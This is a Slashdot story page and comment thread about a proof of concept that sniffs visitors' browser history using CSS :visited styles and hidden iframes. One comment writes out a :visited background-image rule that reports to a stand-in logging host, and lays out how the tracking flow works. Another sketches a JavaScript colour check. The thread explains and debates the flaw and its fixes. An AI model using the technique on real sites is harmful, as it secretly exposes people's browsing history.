Beta

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Sniffing Browser History Without Javascript

kdawson posted more than 5 years ago | from the hole-in-css dept.

Security 216

Ergasiophobia alerts us to a somewhat alarming technology demonstration, in which a Web site you visit generates a pretty good list of sites you have visited — without requiring JavaScript. NoScript will not protect you here. The only obvious drawbacks to this method are that it puts a load on your browser, and that it requires a list of Web sites to check against. "It actually works pretty simply — it is simpler than the JavaScript implementation. All it does is load a page (in a hidden iframe) which contains lots of links. If a link is visited, a background (which isn't really a background) is loaded as defined in the CSS. The 'background' image will log the information, and then store it (and, in this case, it is displayed to you)."

cancel ×

216 comments

Sorry! There are no comments related to the filter you selected.

damnit (-1, Offtopic)

Anonymous Coward | more than 5 years ago | (#28323655)

hotgaycock.cum again?

oh well... i do enjoy the meat missile!

Re:damnit (0, Offtopic)

Tubal-Cain (1289912) | more than 5 years ago | (#28323769)

.cum

They started handing out custom TLDs already?

Well, we fixed it... (4, Funny)

slarrg (931336) | more than 5 years ago | (#28323667)

You can't tell what sites I've been to if it's Slashdotted!

Another workaround... (1)

raehl (609729) | more than 5 years ago | (#28325039)

Only visit really obscure por... dating sites.

Old stuff (5, Informative)

kasot (1274250) | more than 5 years ago | (#28323679)

The CSS history hack has been known since (at least) August 2006: http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html [blogspot.com]

Re:Old stuff (4, Informative)

Anonymous Coward | more than 5 years ago | (#28323873)

Long before that, honestly.

There are Firefox extensions that can help protect against this (see http://www.safecache.com/ and http://www.safehistory.com/ ), but they break enough things on the web that even their creators admit they're not terribly practical.

(Disclaimer: Two of the folks that worked on this also worked for awhile on Chromium with me.)

Re:Old stuff (2, Interesting)

rytier (175186) | more than 5 years ago | (#28324965)

moderation undo (sorry for OT)...

Re:Old stuff (0)

Anonymous Coward | more than 5 years ago | (#28323895)

it appears to me that your 'Old stuff' link requires JavaScript (I turned off JavaScript, it begs me to turn it on). I can't check the current story's link due to slashdot effect, but if TFS is to be believed, no JavaScript is required on the link it contains.

Re:Old stuff (5, Informative)

zmooc (33175) | more than 5 years ago | (#28323947)

Bug 57351 - css on a:visited can load an image and/or reveal if visitor been to a site
Reported: 2000-10-19 16:57 PDT by Jesse Ruderman

Re:Old stuff (5, Informative)

glodime (1015179) | more than 5 years ago | (#28324335)

Bug 57351

Was marked ass a duplicate of 147777
See: https://bugzilla.mozilla.org/show_bug.cgi?id=147777 [mozilla.org]

Vitaly Sharovatov and Walt Gordon Jones have an interesting back and forth on ideas for a proper fix. Search the page linked below for "Walt Gordon Jones" to follow the conversation.
http://sharovatov.wordpress.com/2009/04/21/startpaniccom-and-visited-links-privacy-issue/ [wordpress.com]

Walt Gordon Jones summarizes his point:

The idea that the only way to protect your history data is to give up keeping history at all seems broken to me. Just because the information is in the browser, and I may use it in other ways, doesn't mean it has to be used to mark up the rendered HTML on sites I visit. There's nothing that inextricably ties history to the browser's rendering engine.

Re:Old stuff (1, Interesting)

Anonymous Coward | more than 5 years ago | (#28324767)

The simplest partial solution is to make CSS visited links expire after 1 hour to minimize it's effects. Yet still retain the history in your browser for 2 months, so that you can still search it.

Re:Old stuff (2, Interesting)

black6host (469985) | more than 5 years ago | (#28325023)

Sure... Me, I can just turn off my history if I don't want sites sniffing it this way. What ever made me think, in this day and age, that anything I do, on the net or not, is private?

Sorry, not to bash you, just sad commentary.....

Re:Old stuff (2, Interesting)

Blakey Rat (99501) | more than 5 years ago | (#28324961)

Can you perhaps explain the non-Javascript version in simpler terms than what's on the story's webpage? The explanation on the page is either very vague, or over my head. (Or both.)

I fully understand how you can use Javascript to grab the computed style of the A tag and figure out if it matches the ":visited" style you have defined, but what I don't get is how he's grabbing the style using only server-side technologies. Since when is it possible for a web server to tell the computed style of an element?

Re:Old stuff (2, Interesting)

Blakey Rat (99501) | more than 5 years ago | (#28324997)

Oh wait, I think I just got it.

What he's doing is setting your CSS A:visited property to a image URL, which is defined based on your browser session. Something like:
a:visited { background-image: url( http://scansite.com/image.gif?s=yahoo_com&c=45353535 [scansite.com] ); } Then he's coded up a PHP script that'll log the code at the end of the image URL, and track it in your PHP session variable, or a database.

So, the flowchart looks like:
1) User visits page
2) PHP script generates session ID for the visit
3) PHP script writes an invisible iframe to the page, which includes
  - a link to an Target URL (the URL you're trying to find in the history)
  - a CSS rule defining the A:visited image to be a particular URL + a code for the Target URL + your session ID
  - a meta-refresh tag that instructs the server to refresh the iframe with the next Target URL on the list
4) When the iframe refreshes, the PHP feeds out a list of which Target URLs your session ID has been seen at

Ironically, IE's dubious "click on reload/redirect" feature is (currently) the most effective defense against this technique, as the user isn't likely to notice the constant clicks emanating from their browser while this attack is taking place.

Clever stuff. Someone let me know if I'm off-base on this explanation, but if it's not exactly what he's doing, I'm sure this would work as well.

Will it.. (0)

NervousNerd (1190935) | more than 5 years ago | (#28323689)

Will it know if I've gone on Goatse?

Re:Will it.. (4, Informative)

orange47 (1519059) | more than 5 years ago | (#28323707)

its easy to tell, with that nickname of yours.. :)

big issue is NoScript (5, Informative)

bcrowell (177657) | more than 5 years ago | (#28323691)

I'd care a lot more about this if NoScript was still a viable option. NoScript has become malware at this point. [wikipedia.org] The real issue is the need for someone more trustworthy to make a simpler, and more trustworthy replacement for NoScript. Please? Pretty please?

Re:big issue is NoScript (0, Troll)

Anonymous Coward | more than 5 years ago | (#28323765)

Stop overreacting, that is old news and long since fixed. NoScript is no more "malware" than Firefox itself.

I'm sure you have more crapware and malware installed on your computer that you're blissfully unaware of than you care to admit, yet you single NoScript out for one tiny misstep made and quickly corrected some time back.

Re:big issue is NoScript (5, Insightful)

bcrowell (177657) | more than 5 years ago | (#28323913)

Stop overreacting, that is old news and long since fixed.

Letting someone else's code run on my computer is an act of trust. Once they've shown they're untrustworthy, that's it, as far as I'm concerned. The world's best security software is no good if the author is someone who's demonstrated at least once that you can't trust him.

NoScript is no more "malware" than Firefox itself.

This is an interesting statement, but I don't understand your reasoning. Maybe you could explain more. Have the developers of Firefox done something untrustworthy?

I'm sure you have more crapware and malware installed on your computer that you're blissfully unaware of than you care to admit,

I don't understand how you know so much about my computer. Maybe you could explain more how you became so well informed about what's on my hard disk. I'm running Ubuntu. Are you aware of a lot of crapware that comes with a freshly installed Ubuntu system? Are you aware of a lot of malware that's been observed in the wild infecting Ubuntu systems? If so, I'd be very interested to hear about it.

Re:big issue is NoScript (-1, Troll)

Anonymous Coward | more than 5 years ago | (#28324663)

that shows a serious lack of understanding/empathy to give people one chance before you stop trusting them.

nobody is perfect and those who seem so are lying.

Re:big issue is NoScript (5, Interesting)

Anonymous Coward | more than 5 years ago | (#28323799)

This is not a troll. I wouldn't go so far as saying NoScript is malware, but the author is unscrupulous. For what the addon does, it sure gets updated a lot!

Re:big issue is NoScript (1, Insightful)

bcrowell (177657) | more than 5 years ago | (#28323881)

Hmm...my GP post is modded -1 troll, and the parent post, which says "This is not a troll," and explains why, is also modded -1 troll. It's too bad that you can't both mod and comment; I'd have liked to know why the mods thought there was something trollish about both posts.

Re:big issue is NoScript (2, Informative)

gavron (1300111) | more than 5 years ago | (#28323967)

You CAN mod and comment. When you make the comment, the mods you made go away. If you comment first, you cannot mod.

So the mods could come in here and explain, but then their mods would be gone :)

Heisenberg, we hardly knew ya.

E

Re:big issue is NoScript (1)

MobileTatsu-NJG (946591) | more than 5 years ago | (#28324143)

You CAN mod and comment. When you make the comment, the mods you made go away.

Oh brother. Lucky for you I can comment but not mod.

OT: Re:big issue is NoScript (1)

John Meacham (1112) | more than 5 years ago | (#28324593)

Indeed. the "no mod and comment" rule is perhaps one of the most ill-concieved rules I have seen. It just ensures the people moderating on a topic are the ones who arn't knowledgeable enough to comment on it (or vice versa). Unscrupulous people can just use sockpuppet accounts to moderate so it really only affects honest users who are likely the ones who will add value by commenting and moderating.

Re:OT: Re:big issue is NoScript (5, Insightful)

BrokenHalo (565198) | more than 5 years ago | (#28324745)

the "no mod and comment" rule is perhaps one of the most ill-concieved rules I have seen.

Then perhaps you haven't understood the concept behind the rule. The idea is to prevent individuals having unrestrained ability to push an agenda of their own: hence mod or post, but not both.

Unlike some other long-standing rules on this forum, this is one that actually has very sound reasoning behind it.

Re:OT: Re:big issue is NoScript (0)

Anonymous Coward | more than 5 years ago | (#28324979)

I used to keep an alt account active specifically so that I could mod down my opponents. Even though slashdot goes so far as to portscan you before you can post, it was too stupid to figure out this trick.

Re:big issue is NoScript (1)

davidsyes (765062) | more than 5 years ago | (#28324691)

"I'd have liked to know why the mods thought there was something trollish about both posts."

Mybe thye aer gliffing snue jithout wava....?

Trolls (1, Troll)

iYk6 (1425255) | more than 5 years ago | (#28325045)

Trolls are given mod points too.

Re:big issue is NoScript (3, Informative)

mrmeval (662166) | more than 5 years ago | (#28324089)

He was trying to work around a problem with easylist and handled it badly but easylist is as much to blame for targeting him.

He answers his emails if you care to ask but easylist has ignored me so far.

Re:big issue is NoScript (5, Insightful)

Korin43 (881732) | more than 5 years ago | (#28324541)

Easylist blocks ads. Easylist blocked an ad on his site. How is this their fault? They are doing exactly what they say they do.

Re:big issue is NoScript (1)

melikamp (631205) | more than 5 years ago | (#28323885)

It seems like it's been fixed [noscript.net] .

Re:big issue is NoScript (5, Insightful)

bcrowell (177657) | more than 5 years ago | (#28323943)

It seems like it's been fixed.

The issue isn't that the software had a bug that had to be fixed. The issue is that the author of the software has shown himself to be untrustworthy by making his software interfere with other software, for the purpose of increasing his own financial gain from ads.

Re:big issue is NoScript (3, Insightful)

Blue Stone (582566) | more than 5 years ago | (#28324233)

If anything, I'd say the author of Noscript has proved two things: one, that he is human and makes mistakes, and two, that he has the integrity of character to appologise for his mistakes and rectify them. Neither of which makes him any less trustworthy than anyone else.

Unless you're one of those people who believes that anyone less than perfect with a flawless record of behaviour deserves to be castigated for all time for their transgressions, i suggest you consider a concept called 'forgiveness' which, I believe is most appropriate where the transgressor shows genuine remorse. It seems applicable in this situation, but of course, I can only speak for myself.

(I don't know the guy & I use both noscript and adblock+ with easylist)

Re:big issue is NoScript (0)

Anonymous Coward | more than 5 years ago | (#28324551)

forgiveness? Can I download that from the app store?

Re:big issue is NoScript (1)

Barny (103770) | more than 5 years ago | (#28324635)

Nope, it can only be given, never purchased, kinda like early gmail beta.

Re:big issue is NoScript (1, Insightful)

Anonymous Coward | more than 5 years ago | (#28324657)

You certainly speak for quite a few more than yourself. I for one am really glad someone said it - personally I think a lot of people got way too upset about this, many of which (from the arguments I've read) did not really understand the issue.

Re:big issue is NoScript (5, Informative)

VGPowerlord (621254) | more than 5 years ago | (#28324703)

If anything, I'd say the author of Noscript has proved two things: one, that he is human and makes mistakes, and two, that he has the integrity of character to appologise for his mistakes and rectify them. Neither of which makes him any less trustworthy than anyone else.

From what I hear, he only "apologized" and fixed the problem for several reasons:
1. Because the Firefox devs said that NoScript was breaking Firefox's Add-on Policy [mozilla.org] when it started monkeying around with AdBlock Plus.
2. NoScript's rating was plummeting on the Firefox Add-on site. If this rating drops too much, NoScript would no longer be considered a trusted add-on, and therefore every version would be subject to security review before it exited the Sandbox [mozilla.org] .

Oh, yes, you read that correctly. NoScript is currently not reviewed before new versions go up on the Firefox add-on site.

Incidentally, Mozilla made a new policy [mozilla.com] spelling out some restrictions for add-ons after this incident.

Re:big issue is NoScript (5, Insightful)

supernova_hq (1014429) | more than 5 years ago | (#28324959)

Don't confuse forgiveness with trust.

If someone borrowed your car and backed into a telephone pole, you would be upset. If they paid for the damages, you would probably forgive them. But the question is: Would you trust them with your car..?

Re:big issue is NoScript (4, Interesting)

MikeURL (890801) | more than 5 years ago | (#28324229)

I temporarily uninstalled noscript but I've since put it back on. He admitted a mistake and fixed it. I think that, on balance, I'd rather risk noscript than the endless javascript exploits out there.

Re:big issue is NoScript (4, Interesting)

NimbleSquirrel (587564) | more than 5 years ago | (#28324579)

On the surface it seems like NoScript had descended into the point of malware, but take a look into the history of why Giorgio did what he did [hackademix.net] and you will see that AdBlockPlus (Wladimir) and EasyList (Ares2) weren't entirely innocent in the matter (namely specifically blacklisting NoScript's domains). I notice that Giorgio was quick to apologise for his part, but Wladimir still refuses to apologise for his actions that certainly contributed.

Yes, there needs to be a more trustworthy NoScript, but at the same time there also need to be a more trustworthy AdBlockPlus and more transparency over subscription filtersets like EasyList.

I, personally have taken AdBlockPlus off my system, not because of this debacle, but because one of the updates recently broke my browser. I have found Privoxy much better suited to my needs.

Re:big issue is NoScript (2, Interesting)

Barny (103770) | more than 5 years ago | (#28324675)

Yeah, I find a proxy based solution much better for keeping the bad things out, also has the bonus of protecting my steam browser, my mobile phone browser (when browsing on my wireless) and other in-game browsers for different games.

NoScript is to stop a problem specific to that web browser (namely its masochistic tendency to run scripting like it was "the last line of crack it was ever going to get"), whereas ad sites are needed to be blocked no matter what browser you are on (even lynx).

How to interpret results (4, Funny)

noidentity (188756) | more than 5 years ago | (#28323709)

If the server responds

Service Temporarily Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

then it means you've come from Slashdot.

For the Masses (1, Interesting)

retech (1228598) | more than 5 years ago | (#28323773)

Most people will never understand and basic exploits like this will always work against them. At what point is it the browser's (and app support staff) responsibility to protect the ignorant? The simple fix for this and many things similar is to not cache, don't keep a history, lock your browser down. If you're too stupid to do that... it's kind of your own fault.

Does a car manufacturer have a responsibility to make you drive safe? They make the car and if you're too stupid to learn how to use it properly you'll be weeded out.

Re:For the Masses (3, Insightful)

CopaceticOpus (965603) | more than 5 years ago | (#28323829)

Anyone who allows their browser to cache and keep a history is stupid? Perhaps your tin foil hat is a size too small.

Re:For the Masses (2, Informative)

digitalunity (19107) | more than 5 years ago | (#28323845)

Maybe just clear your cache more often. It's easy, fast and good practice. Ctrl-Shift-Del, press enter.

Do this every time you close FF.

Re:For the Masses (4, Insightful)

Goaway (82658) | more than 5 years ago | (#28323857)

Some of us actually use the browser history.

Re:For the Masses (0)

Anonymous Coward | more than 5 years ago | (#28323927)

I like having my browser history so I can tell if I've read something or not.

Though I do keep it limited to two days.

Honestly, though, I really don't get what all the fuss is about in regards to sites finding out what other sites you visit. Sure, it's an invasion of privacy, but beyond that I don't see how it can be used against you. Unless you're visiting illegal sites.

But if all sites I visit are also visited by thousands of other people each day, why should I care if someone out there on the 'net knows that I'm one of those thousands?

Re:For the Masses (5, Funny)

Opportunist (166417) | more than 5 years ago | (#28324021)

And some of us use one browser for their everyday surfing and one for the naughty pages... I mean, I would do that if I surfed to naughty pages, of course...

Re:For the Masses (2, Informative)

sootman (158191) | more than 5 years ago | (#28324099)

Small but important distinction: this exploit is for browser history, not cache. That shortcut (or shift-command-delete* on a Mac) will bring up the 'clear private data' dialog which covers browser history (the one this exploit is for), download history, saved form and search history, browser cache, and other items.

* Unlike PCs, which have 'backspace' and '(forward) delete' buttons, Macs have two buttons labeled 'delete' or 'del'--the big one which is backspace, and the small one next to help, home, end, etc., which is forward delete. That's the one you need for this shortcut. I imagine laptop users and people who use those new small keyboards are SOL.

Re:For the Masses (1)

NoMaster (142776) | more than 5 years ago | (#28324267)

* Unlike PCs, which have 'backspace' and '(forward) delete' buttons, Macs have two buttons labeled 'delete' or 'del'--the big one which is backspace, and the small one next to help, home, end, etc., which is forward delete. That's the one you need for this shortcut. I imagine laptop users and people who use those new small keyboards are SOL.

In theory, the Mac's Fn key modifies the "delete" key to "del", so laptop / new keyboard users aren't so much SOL as "need to use another finger".

In practice, however, it doesn't matter - on my '06/'07 model Core2Duo MacBook, shift-command-delete works fine & brings up the FF dialogue - as does shift-fn-command-delete.

Re:For the Masses (5, Insightful)

MightyYar (622222) | more than 5 years ago | (#28323973)

Most people will never understand and basic exploits like this will always work against them.

So what, we shouldn't fix it then? The fix is dead-simple: the browser should load all "a:visited" images, regardless of whether or not it will display them.

Re:For the Masses (mod parent up) (1)

Mjec (666932) | more than 5 years ago | (#28324327)

The fix is dead-simple: the browser should load all "a:visited" images, regardless of whether or not it will display them.

I never, ever thought I'd write a post with "mod parent up" in the subject line but this is genius. Perfect solution to all these web-bug issues and really just another form of prefetching.

Re:For the Masses (3, Interesting)

dmomo (256005) | more than 5 years ago | (#28324481)

It's not DEAD-SIMPLE. I'd imagine the only real way is to kill "visited" functionality all together. Blocking images will just block that one exploit. JS isn't needed for this exploit, but it could be used to create other ones.

If a page has the rule: a:visited { color: red; }

And I have a link element with id="myElement". I can just do something like: if($('myElement').style.color === '#f00') alert('scream real loud (with ajax, or load an image.. or something)');

I just thought of that one off hand. Someone may be able to come up with something trickier that requires no js.

The point here is, the solution is not dead simple.

Re:For the Masses (0)

Anonymous Coward | more than 5 years ago | (#28324883)

Most people most vulnerable to this don't use the 'visited' functionality anyway, so YES, that would be a fix.

Re:For the Masses (1)

dissy (172727) | more than 5 years ago | (#28324485)

So what, we shouldn't fix it then? The fix is dead-simple: the browser should load all "a:visited" images, regardless of whether or not it will display them.

Yes, that is a brilliant solution, and to me (Probably in hindsight to your comment) just seems like the most sane action for the browser to take anyway.

It does make the prefetch data larger that needs transfered, but for most people I don't think that would be a big deal anyway, and especially so if pointed out of this attack it counters.
At the very worst it could be an option in about:config that defaults to always load, which could be disabled back to current behavior if data transfer is that much of a concern (as you already would want to cut down other prefetch options in that case.)

I have to question however, is there really a good need or use for a hidden flag on iframes at all??
I honestly don't know, maybe its one of the more handy features in there, and I just don't see it from the user side of things, but 'hidden' is not an attribute I would ever imagine wanting on a frame or iframe...

Re:For the Masses (0)

Anonymous Coward | more than 5 years ago | (#28324147)

The simple fix for this and many things similar is to not cache, don't keep a history, lock your browser down. If you're too stupid to do that... it's kind of your own fault.

...which would be a lot easier if I could run two separate instances of Firefox simultaneously.

Instead, Firefox checks to see if a copy of itself is already resident, and if so, it pops open a new window. A simple command-line option to "run me in a separate process space even if I think I'm already running" would suffice.

Chrome (1)

Runaway1956 (1322357) | more than 5 years ago | (#28324325)

Some browsers DO allow running a second instance.

Send Firefox developers a polite nasty-gram, telling them that you want the ability to open a second, third, or even fourth instance of FF in seperate memory space.

Re:Chrome (4, Informative)

Z80xxc! (1111479) | more than 5 years ago | (#28324363)

would be a lot easier if I could run two separate instances of Firefox simultaneously.

Send Firefox developers a polite nasty-gram, telling them that you want the ability to open a second, third, or even fourth instance of FF in seperate memory space.

This functionality already exists [mozillazine.org] .

"%programfiles%\Mozilla Firefox\firefox.exe" -P "profile to use" -no-remote

Re:Chrome (1)

Runaway1956 (1322357) | more than 5 years ago | (#28324443)

Mod parent up, people.

To be perfectly honest, I think I've read that article before - or one very much like it. Because I didn't see a need for it, I just forgot it.

Thank you, Z80xxc!

Re:For the Masses (1)

hairyfeet (841228) | more than 5 years ago | (#28324503)

Run Firefox in one and Seamonkey [seamonkey-project.org] in the other. Seamonkey the browser component is nothing but Firefox, and even many Firefox extensions work just fine with Seamonkey. You can choose browser only on install if you don't want/need the email, IRC chat, or HTML editor. Plus it is nice to have a "guest browser" for when you have.....guests.

Or if you are on Windows you also have the choices of Kmeleon [sourceforge.net] or KmeleonCCFME [blogspot.com] . Both are superfast Win32 native gecko engine builds, but they don't have as many extensions due to not using XUL. Of the two Kmeleon is great if you want it installed, but I prefer KmeleonCCFME because it comes with ABP installed and is already portable. Just unzip to a flash and go.

This IMHO is one of the great things about Open Source software. if you think you have a better idea you are free to fork it your own way. I have found Seamonkey to be a very useful for getting my older clients away from Outlook Express/IE, and Kmeleon/CCFME is simply very fast on Windows.

Doesn't work on me (2, Informative)

MrMista_B (891430) | more than 5 years ago | (#28323793)

Doesn't work on me - Firefox, with adblock plus, element hiding helper, and flashblock, running whatever the latest Ubuntu is.

Re:Doesn't work on me (4, Funny)

Kotoku (1531373) | more than 5 years ago | (#28323811)

Awesome! Now for all the people who can take and act upon that advice, we can protect .000001% of the population.

It's a start!

Re:Doesn't work on me (1)

Frosty Piss (770223) | more than 5 years ago | (#28323891)

Returned no results for me. FireFox on Windows, no adblock or noscript.

Re:Doesn't work on me (0)

Anonymous Coward | more than 5 years ago | (#28324641)

It took a minute for me - I think I had to mouse over the window. Then I got a short, accurate list of results. Firefox on Leopard, running adblock and noscript.

However, it didn't find anything that was visited during a Distrust session, so there's no harm here....

Re:Doesn't work on me (1)

ElKry (1544795) | more than 5 years ago | (#28323975)

Worked for me, Iceweasel with NoScript in debian SID 64bits.

Re:Doesn't work on me (0)

Anonymous Coward | more than 5 years ago | (#28324903)

Now you're safe from people finding out how depraved you are. Except /. but we'd never use that information against you :>

Old, sure... (3, Interesting)

sootman (158191) | more than 5 years ago | (#28323795)

... and maybe even nefarious, but you've got to admit: it's a neat hack (in the original sense of the word--i.e., clever)

Web Bug Blockers (1)

furbearntrout (1036146) | more than 5 years ago | (#28323861)

Eg. IMG like opera..
You should only load remote images on demand.
Sounds like a no-brainer to me.

Yeah , I know must be new here..

Re:Web Bug Blockers (2, Informative)

Snowblindeye (1085701) | more than 5 years ago | (#28324261)

You should only load remote images on demand.

[...]

Yeah , I know must be new here..

You're not new here, I can tell by the fact that you didn't read the article. Or the summary ;)

This feature actually works like you want it to: It *does* load on demand. And that's the problem here. If it always loaded it this exploit wouldn't work. Its based on only being loaded on demand.

It requires an iframe, so noscript will help you (1)

Logic Worshipper (1518487) | more than 5 years ago | (#28323887)

since noscript blocks iframes, if you configure it properly.

Re:It requires an iframe, so noscript will help yo (5, Informative)

yacc143 (975862) | more than 5 years ago | (#28323951)

It does not require an iframe. It's just that this way it's easier to hide any visual clues.

The basic hack works simple. It sets a different style for visited links. (As such it will only match exact URLs). And one of the cool things your style for visited links specifies is a background URL that works as a webbug.

yacc

Re:It requires an iframe, so noscript will help yo (1)

a-zA-Z0-9$_.+!*'(),x (1468865) | more than 5 years ago | (#28324061)

You're right. You can just add the attribute "hidden" and stick it at -9999 and the user won't see it.

tOM

Re:It requires an iframe, so noscript will help yo (1)

yacc143 (975862) | more than 5 years ago | (#28324919)

Well, hidden might well turn off the complete processing.

OTOH, yes, I think there are a number of ways to hide the links with CSS (foreground == background comes to mind).

yacc

Re:It requires an iframe, so noscript will help yo (0)

Anonymous Coward | more than 5 years ago | (#28324777)

You know what, if you really feel you must repeat your username again as a sig, why not put it in the sig field so we can all filter that stupid crap out.

Clever and evil (1)

dandart (1274360) | more than 5 years ago | (#28323901)

+1 Evil

According to their scanner ive visited... (0)

Anonymous Coward | more than 5 years ago | (#28323989)

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

defeated (1)

Skapare (16644) | more than 5 years ago | (#28324527)

That's the Slashdot Effect [wikipedia.org] at work protecting your privacy.

Alarming? (2, Insightful)

actionbastard (1206160) | more than 5 years ago | (#28324015)

From an exploit standpoint, no. From an editorial standpoint, yes.

Re: Alarming? (2, Funny)

transporter_ii (986545) | more than 5 years ago | (#28324055)

Well, at least I don't have the hiccups any more.
.
.

Just ... (-1, Troll)

PPH (736903) | more than 5 years ago | (#28324067)

... put me down for a few visits to Goatse and save yourself a lot of trouble.

How To Fix Without Breaking CSS (1)

The MAZZTer (911996) | more than 5 years ago | (#28324071)

Normally the browser won't load a CSS-defined external resource if it's not required, but in this case, for links it should load resources under :visited for any link, visited or not. This way this PoC would return visited for any random site, they really wouldn't get any useful data. However 1) it uses a bit more bandwidth fetching images that may not be used, although they are precached in the event the links do end up being clicked and 2) false positives on sites which use this for targeted ads etc might trigger said ads.

My idea for a fix for the JS version of the exploit (IIRC it's where you fetch the style information for a link, say, it's color, and have visited links colored differently from unvisited) would be to have any JS queries against CSS on links return the styling of the link if it WASN'T visited... regardless of whether it actually is or not. Shouldn't break any web apps unless someone uses it like a HTTP referer to see if you came from their site to the current page or something...

Re:How To Fix Without Breaking CSS (2, Interesting)

Skapare (16644) | more than 5 years ago | (#28324153)

IMHO a better fix is to completely disable looking up browser history for link styling. Let it treat all links as unvisited if there is no difference in styling these different classes of links. Make it the default to use the same style (most people don't care). Then re-enable the lookup if the styles are changed and the result of the change is 2 or more different styles (and pop up a warning that JS and CSS and see these style variations and this can expose detection of sites you have visited).

Re:How To Fix Without Breaking CSS (1)

nacturation (646836) | more than 5 years ago | (#28325033)

The GP's solution doesn't break any functionality while at the same time making this exploit useless. If background images can be used to detect visit status, then just load them all regardless of visit status but still display them correctly to the user. The current implementation selectively loads only the ones that will get displayed, which is what makes this exploit possible. If queried via javascript (the other attack vector) always return the unvisited state.

Everything still works 100% in that the user sees what they always expected to see, but a malicious site will not be able to gather any information. Your solution of "completely disabling browser history for link styling" breaks functionality which, to me, isn't a better fix.

In Soviet Russia, web sites visit you (3, Interesting)

Skapare (16644) | more than 5 years ago | (#28324117)

I'm letting it scan my browser now. So far the only thing it has found is Slashdot. It could maybe find sites that I've followed links from Slashdot to. But it won't find much because I run a separate browser instance, with its own (initially empty) browser history, cookies, etc, for each site I visit via by the means I have set up to start a new browser (command line script, and menu selection for the browser). And for those of you who are wanting to tell me "but Firefox just joins all startups into the same process and only gives you a new window". Well, I defeated that by dynamically creating a new home directory on the fly for each startup, populating it with a template set of files Firefox expects, setting the HOME environment variable to that path, and starting the Firefox process. So the scanning of my browser is limited to just what this one I use for Slashdot has visited recently.

Re:In Soviet Russia, web sites visit you (2, Insightful)

Anonymous Coward | more than 5 years ago | (#28324169)

Well, I defeated that by dynamically creating a new home directory on the fly for each startup, populating it with a template set of files Firefox expects, setting the HOME environment variable to that path, and starting the Firefox process. So the scanning of my browser is limited to just what this one I use for Slashdot has visited recently.

Script plz?

This has been a pet peeve of mine for ages. I've got a bunch of users in a Windows environment without Cygwin, but I'd translate the shell script into DOS .BAT if that's what it takes to solve this problem.

Re:In Soviet Russia, web sites visit you (0)

Anonymous Coward | more than 5 years ago | (#28324439)

For when you don't need/want all of Cygwin, you can use this little package of Unix utilities [sourceforge.net] . It covers the basic Unix commands and includes a basic shell.

Re:In Soviet Russia, web sites visit you (1)

Skapare (16644) | more than 5 years ago | (#28324487)

The script is rather large because it has a lot of other customization in it.

Re:In Soviet Russia, web sites visit you (1)

Minwee (522556) | more than 5 years ago | (#28324303)

Canadian zip code humor: http://tinyurl.com/V4G1N4 [tinyurl.com]

That would be a lot funnier if Canada actually used zip codes. Or "humor". But at least you spelled the first word right.

Re:In Soviet Russia, web sites visit you (1)

BikeHelmet (1437881) | more than 5 years ago | (#28324331)

That was supposed to be funny, right? I can't imagine anyone going to that much effort. Are you also running it in a virtual machine?

Anyway... I scanned with it, and it found nothing. But since my browser has no history, maybe that's affecting it.

Re:In Soviet Russia, web sites visit you (1)

Skapare (16644) | more than 5 years ago | (#28324499)

I wrote the script for many reasons. It customizes the browser on the fly, too. For example, it codes the process ID of the shell that parents it into the localnet IP address configured to connect to the proxy server with. That way I can track connections back to specific browser instances. It also puts the process ID into the default home page after "#". There are some other customizations, some controlled by environment variables. And it is not yet converted to FF 3 (error: out of space on todo plate).

Re:In Soviet Russia, web sites visit you (2, Informative)

Blakey Rat (99501) | more than 5 years ago | (#28324953)

So... you posted just to brag about the extreme efforts you go to to support your irrational paranoia?

Thanks, I guess?

Actually (1)

Cylix (55374) | more than 5 years ago | (#28324329)

There are several firefox plugins which limit and reduce your history.

I don't think the NoScript fellows are specifically targeting anonymity, but rather simply choosing what actions (in a volatile world) can be executed.

There exist a world of many more precautions to take for those who are worried about keeping their privacy.

Lynx (-1, Troll)

Anonymous Coward | more than 5 years ago | (#28324343)

Does it work on Lynx?

Besides visited sites... (1)

sam0737 (648914) | more than 5 years ago | (#28324441)

For site that allowed user to post CSS content, and that's there is interest to steal the cookie, it could be done in the same way.
For example, xanga.com (cookie to steal your login info), or Forum/BBS site that allows poisting CSS.

The cookies will be sent along with the CSS background request.

Blogger/Blogspot is a good example how this should be handled...just put it in two different domains.

Re:Besides visited sites... (0)

Anonymous Coward | more than 5 years ago | (#28324841)

It won't do much good to steal a cookie for login info. You would have to be a complete moron to set login cookies that contained anything more than a hash, which would be worthless to anyone stealing it.

No more "cool" stuff, please. (1)

Waccoon (1186667) | more than 5 years ago | (#28324511)

I can disable JavaScript, Java, cookies, and password memorization. That's great. Now, please let me disable the most useless feature of all: iframes.

Oh, wait... then web developers will inject 3rd party web code directly into the main document with AJAX, which is even worse.

Ingenious (1)

pixelot (1539093) | more than 5 years ago | (#28324763)

This is pretty sweet, albeit scary.

Blocked by InPrivate (-1, Troll)

Anonymous Coward | more than 5 years ago | (#28324911)

If you care about your history being sniffed like this, you can just use IE8's InPrivate mode.

On the other hand (1)

bytesex (112972) | more than 5 years ago | (#28325159)

Maybe one can use this site to their advantage. Obviously, the owners know something we know not - popularity of websites. If you can 'play' the browser at the user end, you can have a look into their database. See what they're searching for and how. It cuts both ways.

Load More Comments
Slashdot Login

Need an Account?

Forgot your password?
or Connect with...

Don't worry, we never post anything without your permission.

Submission Text Formatting Tips

We support a small subset of HTML, namely these tags:

  • b
  • i
  • p
  • br
  • a
  • ol
  • ul
  • li
  • dl
  • dt
  • dd
  • em
  • strong
  • tt
  • blockquote
  • div
  • quote
  • ecode

"ecode" can be used for code snippets, for example:

<ecode>    while(1) { do_something(); } </ecode>